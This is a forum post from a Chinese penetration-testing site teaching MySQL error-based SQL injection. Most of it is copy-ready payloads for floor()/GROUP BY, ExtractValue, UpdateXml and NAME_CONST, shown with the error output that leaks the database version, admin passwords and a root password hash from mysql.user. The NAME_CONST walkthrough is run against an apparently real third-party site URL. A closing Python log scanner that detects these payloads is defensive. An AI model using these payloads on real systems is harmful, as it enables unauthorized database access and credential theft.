中国网络渗透测试联盟
Title: MySQL floor, ExtractValue and UpdateXml: three error-based injection techniques
Author: admin  Time: 2015-11-11 19:03
1. Error via floor()
The following payloads can be used:
and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));
Example:
First, a normal query:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement triggers the error:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
The MySQL version is leaked in the error message (the trailing 1 is the floor(rand(0)*2) term appended by concat()). To retrieve other data, replace version() with the desired subquery.
For example, to retrieve the administrator's username and password:
Method 1:
mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:
mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
Actual test:
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:
and 1=(updatexml(1,concat(0x3a,(select user())),1))
Actual test:
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
Further collected material:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)
Error: Duplicate column name '5.0.27-community-nt'
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)
Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
Error-based injection on newer MySQL versions: exploiting NAME_CONST
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information
NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.
Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.
SELECT NAME_CONST('TEST', 1)
|---------------|
| TEST          |
|---------------|
| 1             |
|---------------|
http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables
Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.
Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261
Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable.
MySQL 5.1.3 Server System Variables
Let's try it out on my site..
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error: Duplicate column name '5.0.27-community-nt'
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...
Data Extraction
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error...
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error: Duplicate column name '1'
Now let's get the tables out this bitch..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here; if it does, we can go on and finish the job.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error: Duplicate column name 'com_admanage'
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.
Let's get the columns out of the user table..
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'.
Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error: Duplicate column name 'Host'
Woot, time to finish this bitch off.
Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this...
Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
And there we have it, thanks for reading.
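As an added defensive example (not part of the original post or of any tool it mentions), the following Python scans constructed web-server and application log lines for the four payload families discussed above (floor/GROUP BY, ExtractValue, UpdateXml, NAME_CONST) and pulls out the value that each MySQL error message echoed back, which is what a responder needs to know in order to judge what was leaked. The signature names, the log format and the PLACEHOLDER_HASH value are my assumptions.

```python
import re
from urllib.parse import unquote_plus

# Request-side signatures, checked after URL decoding; every regex in the list must
# match, so the floor() family covers both shapes in the post (floor before or after GROUP BY).
PAYLOAD_SIGNATURES = {
    "floor_group_by": [re.compile(r"floor\s*\(\s*rand\s*\(", re.I), re.compile(r"group\s+by", re.I)],
    "extractvalue": [re.compile(r"\bextractvalue\s*\(", re.I)],
    "updatexml": [re.compile(r"\bupdatexml\s*\(", re.I)],
    "name_const": [re.compile(r"\bname_const\s*\(", re.I)],
}
# Error-side signatures: the MySQL messages that carry data out; group 1 is the echoed value.
ERROR_SIGNATURES = {
    "floor_group_by": re.compile(r"Duplicate entry '(.*?)' for key 'group_key'"),
    "xpath": re.compile(r"XPATH syntax error: '(.*?)'"),
    "name_const": re.compile(r"Duplicate column name '(.*?)'"),
}
SEPARATORS = "\\:~ "  # 0x5c, 0x3a and 0x207e20: the marker prefixes used in the post

def classify_request(line):
    # Payload families present in a raw (URL-encoded) request line
    decoded = unquote_plus(line)
    return [name for name, rxs in PAYLOAD_SIGNATURES.items() if all(rx.search(decoded) for rx in rxs)]

def leaked_values(line):
    # (technique, value) pairs for every data-bearing error message in the line
    hits = []
    for name, rx in ERROR_SIGNATURES.items():
        for m in rx.finditer(line):
            value = m.group(1)
            if name == "floor_group_by":
                value = value[:-1]  # drop the trailing 0/1 that floor(rand(0)*2) appended
            hits.append((name, value.lstrip(SEPARATORS)))
    return hits

def scan_log(lines):
    # Flag every line carrying a payload, a leaking error message, or both
    findings = []
    for line in lines:
        techniques, leaks = classify_request(line), leaked_values(line)
        if techniques or leaks:
            findings.append({"techniques": techniques, "leaks": leaks, "line": line})
    return findings

# Constructed sample: two access-log requests and three application error lines
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:01 +0800] "GET /detail.php?id=330 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [11/Nov/2015:19:03:09 +0800] "GET /detail.php?id=330+and+extractvalue(1,concat(0x5c,(select+pass+from+admin+limit+1))) HTTP/1.1" 500 230',
    "app[1234]: ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "app[1234]: ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "app[1234]: Duplicate column name 'root ~ *PLACEHOLDER_HASH'",
]
```

A 500 response paired with any of these error strings in the application log is the observable a detection rule should key on; the remediation on the application side is to stop interpolating `id` into the query and to stop returning raw database errors to the client.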